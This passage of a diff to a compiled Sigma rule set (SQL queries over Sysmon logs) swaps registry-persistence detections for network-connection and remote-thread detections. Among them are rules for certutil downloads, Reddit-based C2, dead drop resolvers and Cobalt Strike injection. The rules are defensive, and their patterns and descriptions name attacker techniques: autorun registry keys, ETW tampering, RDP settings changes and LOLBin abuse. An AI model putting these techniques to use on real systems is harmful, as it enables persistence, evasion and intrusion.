OR Details LIKE '%rundll32%' ESCAPE '\\' OR Details LIKE '%regsvr32%' ESCAPE '\\' OR Details LIKE '%mshta%' ESCAPE '\\' OR Details LIKE '%cscript%' ESCAPE '\\' OR Details LIKE '%wscript%' ESCAPE '\\' OR Details LIKE '%.bat%' ESCAPE '\\' OR Details LIKE '%.hta%' ESCAPE '\\' OR Details LIKE '%.dll%' ESCAPE '\\' OR Details LIKE '%.ps1%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (DestinationPort IN ('5985', '5986') AND Initiated = 'true') AND NOT (((User LIKE '%NETWORK SERVICE%' ESCAPE '\\' OR User LIKE '%NETZWERKDIENST%' ESCAPE '\\' OR User LIKE '%SERVIZIO DI RETE%' ESCAPE '\\' OR User LIKE '%SERVICIO DE RED%' ESCAPE '\\') OR User LIKE '%SERVICE R%' ESCAPE '\\' AND User LIKE '%SEAU%' ESCAPE '\\' OR SourceIp LIKE '0:0:%' ESCAPE '\\' OR (Image LIKE 'C:\\\\Program Files\\\\Avast Software\\\\Avast\\\\AvastSvc.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Avast Software\\\\Avast\\\\AvastSvc.exe' ESCAPE '\\')) OR (SourceIp IN ('::1', '127.0.0.1') AND DestinationIp IN ('::1', '127.0.0.1'))))" ], - "filename": "registry_set_persistence_app_paths.yml" + "filename": "net_connection_win_remote_powershell_session_network.yml" }, { - "title": "Blackbyte Ransomware Registry", - "id": "83314318-052a-4c90-a1ad-660ece38d276", - "status": "test", - "description": "BlackByte set three different registry values to escalate privileges and begin setting the stage for lateral movement and encryption", - "author": "frack113", + "title": "Cmstp Making Network Connection", + "id": "efafe0bf-4238-479e-af8f-797bd3490d2d", + "status": "experimental", + "description": "Detects suspicious network connection by Cmstp", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1112" + "attack.t1218.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\LocalAccountTokenFilterPolicy' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\EnableLinkedConnections' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\FileSystem\\\\LongPathsEnabled' ESCAPE '\\') AND Details = 'DWORD (0x00000001)')" + "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\cmstp.exe' ESCAPE '\\' AND Initiated = 'true')" ], - "filename": "registry_set_blackbyte_ransomware.yml" + "filename": "net_connection_win_susp_cmstp.yml" }, { - "title": "Potential Persistence Via MyComputer Registry Keys", - "id": "8fbe98a8-8f9d-44f8-aa71-8c572e29ef06", - "status": "experimental", - "description": "Detects modification to the \"Default\" value of the \"MyComputer\" key and subkeys to point to a custom binary that will be launched whenever the associated action is executed (see reference section for example)", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Potential Dead Drop Resolvers", + "id": "297ae038-edc2-4b2e-bb3e-7c5fc94dd5c7", + "status": "test", + "description": "Detects an executable, which is not an internet browser, making DNS request to legit popular websites, which were seen to be used as dead drop resolvers in previous attacks.", + "author": "Sorina Ionescu", "tags": [ - "attack.persistence" + "attack.command_and_control", + "attack.t1102", + "attack.t1102.001" ], "falsepositives": [ - "Unlikely but if you experience FPs add specific processes and locations you would like to monitor for" + "One might need to exclude other internet browsers found in it's network or other applications like ones mentioned above from Microsoft Defender." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\MyComputer%' ESCAPE '\\' AND TargetObject LIKE '%(Default)' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Initiated = 'true' AND (DestinationHostname LIKE '%.cloudflare.com' ESCAPE '\\' OR DestinationHostname LIKE '%.githubusercontent.com' ESCAPE '\\' OR DestinationHostname LIKE '%cdn.discordapp.com' ESCAPE '\\' OR DestinationHostname LIKE '%docs.google.com' ESCAPE '\\' OR DestinationHostname LIKE '%facebook.com' ESCAPE '\\' OR DestinationHostname LIKE '%feeds.rapidfeeds.com' ESCAPE '\\' OR DestinationHostname LIKE '%fotolog.com' ESCAPE '\\' OR DestinationHostname LIKE '%imgur.com' ESCAPE '\\' OR DestinationHostname LIKE '%livejournal.com' ESCAPE '\\' OR DestinationHostname LIKE '%paste.ee' ESCAPE '\\' OR DestinationHostname LIKE '%pastebin.com' ESCAPE '\\' OR DestinationHostname LIKE '%pastebin.pl' ESCAPE '\\' OR DestinationHostname LIKE '%pastetext.net' ESCAPE '\\' OR DestinationHostname LIKE '%reddit.com' ESCAPE '\\' OR DestinationHostname LIKE '%steamcommunity.com' ESCAPE '\\' OR DestinationHostname LIKE '%technet.microsoft.com' ESCAPE '\\' OR DestinationHostname LIKE '%twitter.com' ESCAPE '\\' OR DestinationHostname LIKE '%youtube.com' ESCAPE '\\')) AND NOT ((Image LIKE '%\\\\brave.exe' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files (x86)\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\')) OR (Image LIKE '%\\\\maxthon.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeWebView\\\\Application\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\WindowsApps\\\\MicrosoftEdge.exe' ESCAPE '\\' OR (Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeCore\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Microsoft\\\\EdgeCore\\\\%' ESCAPE '\\') AND (Image LIKE '%\\\\msedge.exe' ESCAPE '\\' OR Image LIKE '%\\\\msedgewebview2.exe' ESCAPE '\\')) OR (Image LIKE '%\\\\opera.exe' ESCAPE '\\') OR (Image LIKE '%\\\\safari.exe' ESCAPE '\\') OR (Image LIKE '%\\\\seamonkey.exe' ESCAPE '\\') OR (Image LIKE '%\\\\vivaldi.exe' ESCAPE '\\') OR (Image LIKE '%\\\\whale.exe' ESCAPE '\\'))) AND NOT (((Image LIKE '%\\\\MsMpEng.exe' ESCAPE '\\' OR Image LIKE '%\\\\MsSense.exe' ESCAPE '\\')) OR (Image LIKE '%\\\\PRTG Probe.exe' ESCAPE '\\') OR (Image LIKE '%\\\\Engine.exe' ESCAPE '\\')))" ], - "filename": "registry_set_persistence_mycomputer.yml" + "filename": "net_connection_win_dead_drop_resolvers.yml" }, { - "title": "Service Binary in Suspicious Folder", - "id": "a07f0359-4c90-4dc4-a681-8ffea40b4f47", + "title": "RDP to HTTP or HTTPS Target Ports", + "id": "b1e5da3b-ca8e-4adf-915c-9921f3d85481", "status": "experimental", - "description": "Detect the creation of a service with a service binary located in a suspicious directory", - "author": "Florian Roth (Nextron Systems), frack113", + "description": "Detects svchost hosting RDP termsvcs communicating to target systems on TCP port 80 or 443", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.command_and_control", + "attack.t1572", + "attack.lateral_movement", + "attack.t1021.001", + "car.2013-07-002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Start' ESCAPE '\\' AND (Image LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Perflogs\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\ADMIN$\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Temp\\\\%' ESCAPE '\\') AND Details IN ('DWORD (0x00000000)', 'DWORD (0x00000001)', 'DWORD (0x00000002)')) OR (EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\ImagePath' ESCAPE '\\' AND (Details LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\Perflogs\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\ADMIN$\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\Temp\\\\%' ESCAPE '\\'))) AND NOT ((Image LIKE '%\\\\Common Files\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\Temp\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND Initiated = 'true' AND SourcePort = '3389' AND DestinationPort IN ('80', '443'))" ], - "filename": "registry_set_creation_service_susp_folder.yml" + "filename": "net_connection_win_rdp_to_http.yml" }, { - "title": "Adwind RAT / JRAT - Registry", - "id": "42f0e038-767e-4b85-9d96-2c6335bad0b5", + "title": "Connection Initiated Via Certutil.EXE", + "id": "0dba975d-a193-4ed1-a067-424df57570d1", "status": "experimental", - "description": "Detects javaw.exe in AppData folder as used by Adwind / JRAT", - "author": "Florian Roth (Nextron Systems), Tom Ueltschi, Jonhnathan Ribeiro, oscd.community", + "description": "Detects a network connection initiated by the certutil.exe tool.\nAttackers can abuse the utility in order to download malware or additional payloads.\n", + "author": "frack113, Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.005", - "attack.t1059.007" + "attack.command_and_control", + "attack.t1105" + ], + "falsepositives": [ + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\' AND Details LIKE '\\%AppData\\%\\\\Roaming\\\\Oracle\\\\bin\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\certutil.exe' ESCAPE '\\' AND Initiated = 'true' AND DestinationPort IN ('80', '135', '443', '445'))" ], - "filename": "registry_set_mal_adwind.yml" + "filename": "net_connection_win_certutil_initiated_connection.yml" }, { - "title": "Potential Credential Dumping Attempt Using New NetworkProvider - REG", - "id": "0442defa-b4a2-41c9-ae2c-ea7042fc4701", - "status": "experimental", - "description": "Detects when an attacker tries to add a new network provider in order to dump clear text credentials, similar to how the NPPSpy tool does it", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Wuauclt Network Connection", + "id": "c649a6c7-cd8c-4a78-9c04-000fc76df954", + "status": "test", + "description": "Detects the use of the Windows Update Client binary (wuauclt.exe) to proxy execute code and making a network connections.\nOne could easily make the DLL spawn a new process and inject to it to proxy the network connection and bypass this rule.\n", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.credential_access", - "attack.t1003" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Other legitimate network providers used and not filtred in this rule" + "Legitimate use of wuauclt.exe over the network." ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\System\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\NetworkProvider%' ESCAPE '\\') AND NOT (((TargetObject LIKE '%\\\\System\\\\CurrentControlSet\\\\Services\\\\WebClient\\\\NetworkProvider%' ESCAPE '\\' OR TargetObject LIKE '%\\\\System\\\\CurrentControlSet\\\\Services\\\\LanmanWorkstation\\\\NetworkProvider%' ESCAPE '\\' OR TargetObject LIKE '%\\\\System\\\\CurrentControlSet\\\\Services\\\\RDPNP\\\\NetworkProvider%' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\poqexec.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%wuauclt%' ESCAPE '\\' AND NOT (((DestinationIp LIKE '20.184.%' ESCAPE '\\' OR DestinationIp LIKE '20.185.%' ESCAPE '\\' OR DestinationIp LIKE '20.186.%' ESCAPE '\\' OR DestinationIp LIKE '20.187.%' ESCAPE '\\' OR DestinationIp LIKE '20.188.%' ESCAPE '\\' OR DestinationIp LIKE '20.189.%' ESCAPE '\\' OR DestinationIp LIKE '20.190.%' ESCAPE '\\' OR DestinationIp LIKE '20.191.%' ESCAPE '\\' OR DestinationIp LIKE '23.79.%' ESCAPE '\\' OR DestinationIp LIKE '51.10.%' ESCAPE '\\' OR DestinationIp LIKE '51.103.%' ESCAPE '\\' OR DestinationIp LIKE '51.104.%' ESCAPE '\\' OR DestinationIp LIKE '51.105.%' ESCAPE '\\' OR DestinationIp LIKE '52.239.%' ESCAPE '\\')) OR (CommandLine LIKE '%\\\\UpdateDeploy.dll /ClassId %' ESCAPE '\\')))" ], - "filename": "registry_set_new_network_provider.yml" + "filename": "net_connection_win_wuauclt_network_connection.yml" }, { - "title": "Potential Signing Bypass Via Windows Developer Features - Registry", - "id": "b110ebaf-697f-4da1-afd5-b536fa27a2c1", + "title": "Suspicious Epmap Connection", + "id": "628d7a0b-7b84-4466-8552-e6138bc03b43", "status": "experimental", - "description": "Detects when the enablement of developer features such as \"Developer Mode\" or \"Application Sideloading\". Which allows the user to install untrusted packages.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects suspicious \"epmap\" connection to a remote computer via remote procedure call (RPC)", + "author": "frack113, Tim Shelton (fps)", "tags": [ - "attack.defense_evasion" + "attack.lateral_movement" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\AppModelUnlock%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Policies\\\\Microsoft\\\\Windows\\\\Appx\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\AllowAllTrustedApps' ESCAPE '\\' OR TargetObject LIKE '%\\\\AllowDevelopmentWithoutDevLicense' ESCAPE '\\') AND Details = 'DWORD (0x00000001)')" + "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Protocol = 'tcp' AND Initiated = 'true' AND DestinationPort = '135') AND NOT ((Image LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\ProgramData\\\\Amazon\\\\SSM\\\\Update\\\\amazon-ssm-agent-updater%' ESCAPE '\\')))" ], - "filename": "registry_set_turn_on_dev_features.yml" + "filename": "net_connection_win_susp_epmap.yml" }, { - "title": "NET NGenAssemblyUsageLog Registry Key Tamper", - "id": "28036918-04d3-423d-91c0-55ecf99fb892", - "status": "experimental", - "description": "Detects changes to the NGenAssemblyUsageLog registry key.\n.NET Usage Log output location can be controlled by setting the NGenAssemblyUsageLog CLR configuration knob in the Registry or by configuring an environment variable (as described in the next section).\nBy simplify specifying an arbitrary value (e.g. fake output location or junk data) for the expected value, a Usage Log file for the .NET execution context will not be created.\n", + "title": "Msiexec Initiated Connection", + "id": "8e5e38e4-5350-4c0b-895a-e872ce0dd54f", + "status": "test", + "description": "Adversaries may abuse msiexec.exe to proxy execution of malicious payloads.\nMsiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi)\n", "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1112" + "attack.t1218.007" ], "falsepositives": [ - "Unknown" + "Legitimate msiexec over networks" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\.NETFramework\\\\NGenAssemblyUsageLog' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Initiated = 'true' AND Image LIKE '%\\\\msiexec.exe' ESCAPE '\\')" ], - "filename": "registry_set_net_cli_ngenassemblyusagelog.yml" + "filename": "net_connection_win_msiexec.yml" }, { - "title": "ETW Logging Disabled For SCM", - "id": "4f281b83-0200-4b34-bf35-d24687ea57c2", + "title": "Suspicious Non-Browser Network Communication With Reddit API", + "id": "d7b09985-95a3-44be-8450-b6eadf49833e", "status": "experimental", - "description": "Detects changes to the \"TracingDisabled\" key in order to disable ETW logging for services.exe (SCM)", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects an a non-browser process interacting with the Reddit API which could indicate use of a covert C2 such as RedditC2", + "author": "Gavin Knapp", "tags": [ - "attack.defense_evasion", - "attack.t1112", - "attack.t1562" + "attack.command_and_control", + "attack.t1102" ], "falsepositives": [ - "Unknown" + "Legitimate applications communicating with the Reddit API e.g. web browsers not in the exclusion list, app with an RSS etc." ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Tracing\\\\SCM\\\\Regular\\\\TracingDisabled' ESCAPE '\\' AND Details = 'DWORD (0x00000001)')" + "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND DestinationHostname LIKE '%reddit.com%' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\brave.exe' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files (x86)\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\')) OR (Image LIKE '%\\\\maxthon.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeWebView\\\\Application\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\WindowsApps\\\\MicrosoftEdge.exe' ESCAPE '\\' OR (Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeCore\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Microsoft\\\\EdgeCore\\\\%' ESCAPE '\\') AND (Image LIKE '%\\\\msedge.exe' ESCAPE '\\' OR Image LIKE '%\\\\msedgewebview2.exe' ESCAPE '\\')) OR (Image LIKE '%\\\\opera.exe' ESCAPE '\\') OR (Image LIKE '%\\\\safari.exe' ESCAPE '\\') OR (Image LIKE '%\\\\seamonkey.exe' ESCAPE '\\') OR (Image LIKE '%\\\\vivaldi.exe' ESCAPE '\\') OR (Image LIKE '%\\\\whale.exe' ESCAPE '\\')))" ], - "filename": "registry_set_services_etw_tamper.yml" + "filename": "net_connection_win_reddit_api_non_browser_access.yml" }, { - "title": "Potential Persistence Via CHM Helper DLL", - "id": "976dd1f2-a484-45ec-aa1d-0e87e882262b", + "title": "Python Initiated Connection", + "id": "bef0bc5a-b9ae-425d-85c6-7b2d705980c6", "status": "experimental", - "description": "Detects when an attacker modifies the registry key \"HtmlHelp Author\" to achieve persistence", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation", + "author": "frack113", "tags": [ - "attack.persistence" + "attack.discovery", + "attack.t1046" ], "falsepositives": [ - "Unknown" + "Legitimate python script" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\HtmlHelp Author\\\\Location%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\WOW6432Node\\\\Microsoft\\\\HtmlHelp Author\\\\Location%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Initiated = 'true' AND Image LIKE '%python%' ESCAPE '\\') AND NOT ((ParentImage LIKE 'C:\\\\ProgramData\\\\Anaconda3\\\\Scripts\\\\conda.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\ProgramData\\\\Anaconda3\\\\Scripts\\\\conda-script.py%' ESCAPE '\\' AND CommandLine LIKE '%update%' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\ProgramData\\\\Anaconda3\\\\python.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\ProgramData\\\\Anaconda3\\\\Scripts\\\\jupyter-notebook-script.py%' ESCAPE '\\') OR (DestinationIp = '127.0.0.1' AND SourceIp = '127.0.0.1')))" ], - "filename": "registry_set_persistence_chm.yml" + "filename": "net_connection_win_python.yml" }, { - "title": "Wow6432Node Windows NT CurrentVersion Autorun Keys Modification", - "id": "480421f9-417f-4d3b-9552-fd2728443ec8", + "title": "Script Initiated Connection", + "id": "08249dc0-a28d-4555-8ba5-9255a198e08c", "status": "experimental", - "description": "Detects modification of autostart extensibility point (ASEP) in registry.", - "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", + "description": "Detects a script interpreter wscript/cscript opening a network connection. Adversaries may use script to download malicious payloads.", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", - "Legitimate administrator sets up autorun keys for legitimate reason" + "Legitimate scripts" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Windows\\\\Appinit\\_Dlls%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Image File Execution Options%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Drivers32%' ESCAPE '\\')) AND NOT ((Details LIKE '(Empty)' ESCAPE '\\' OR Details LIKE '\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Initiated = 'true' AND (Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\'))" ], - "filename": "registry_set_asep_reg_keys_modification_wow6432node_currentversion.yml" + "filename": "net_connection_win_script.yml" }, { - "title": "RDP Sensitive Settings Changed to Zero", - "id": "a2863fbc-d5cb-48d5-83fb-d976d4b1743b", + "title": "CobaltStrike Process Injection", + "id": "6309645e-122d-4c5b-bb2b-22e4f9c2fa42", "status": "test", - "description": "Detects tampering of RDP Terminal Service/Server sensitive settings.\nSuch as allowing unauthorized users access to a system via the 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections', etc.\n", - "author": "Samir Bousseaden, David ANDRE, Roberto Rodriguez @Cyb3rWard0g, Nasreddine Bencherchali", + "description": "Detects a possible remote threat creation with certain characteristics which are typical for Cobalt Strike beacons", + "author": "Olaf Hartong, Florian Roth (Nextron Systems), Aleksey Potapov, oscd.community", "tags": [ "attack.defense_evasion", - "attack.persistence", - "attack.t1112" + "attack.t1055.001" ], "falsepositives": [ - "Some of the keys mentioned here could be modified by an administrator while setting group policy (it should be investigated either way)" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetObject LIKE '%\\\\fDenyTSConnections' ESCAPE '\\' OR TargetObject LIKE '%\\\\fSingleSessionPerUser' ESCAPE '\\' OR TargetObject LIKE '%\\\\UserAuthentication' ESCAPE '\\') AND Details = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE (EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (StartAddress LIKE '%0B80' ESCAPE '\\' OR StartAddress LIKE '%0C7C' ESCAPE '\\' OR StartAddress LIKE '%0C88' ESCAPE '\\'))" ], - "filename": "registry_set_terminal_server_suspicious.yml" + "filename": "create_remote_thread_win_cobaltstrike_process_injection.yml" }, { - "title": "Wow6432Node Classes Autorun Keys Modification", - "id": "18f2065c-d36c-464a-a748-bcf909acb2e3", - "status": "test", - "description": "Detects modification of autostart extensibility point (ASEP) in registry.", - "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", + "title": "Remote Thread Creation Ttdinject.exe Proxy", + "id": "c15e99a3-c474-48ab-b9a7-84549a7a9d16", + "status": "experimental", + "description": "Detects a remote thread creation of Ttdinject.exe used as proxy", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.defense_evasion", + "attack.t1127" ], "falsepositives": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", - "Legitimate administrator sets up autorun keys for legitimate reason" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Software\\\\Wow6432Node\\\\Classes%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Folder\\\\ShellEx\\\\ExtShellFolderViews%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Folder\\\\ShellEx\\\\DragDropHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Folder\\\\ShellEx\\\\ColumnHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Directory\\\\Shellex\\\\DragDropHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Directory\\\\Shellex\\\\CopyHookHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{AC757296-3522-4E11-9862-C17BE5A1767E}\\\\Instance%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{ABE3B9A4-257D-4B97-BD1A-294AF496222E}\\\\Instance%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{7ED96837-96F0-4812-B211-F13C24117ED3}\\\\Instance%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{083863F1-70DE-11d0-BD40-00A0C911CE86}\\\\Instance%' ESCAPE '\\' OR TargetObject LIKE '%\\\\AllFileSystemObjects\\\\ShellEx\\\\DragDropHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ShellEx\\\\PropertySheetHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ShellEx\\\\ContextMenuHandlers%' ESCAPE '\\')) AND NOT (Details = '(Empty)'))" + "SELECT * FROM logs WHERE (EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND SourceImage LIKE '%\\\\ttdinject.exe' ESCAPE '\\')" ], - "filename": 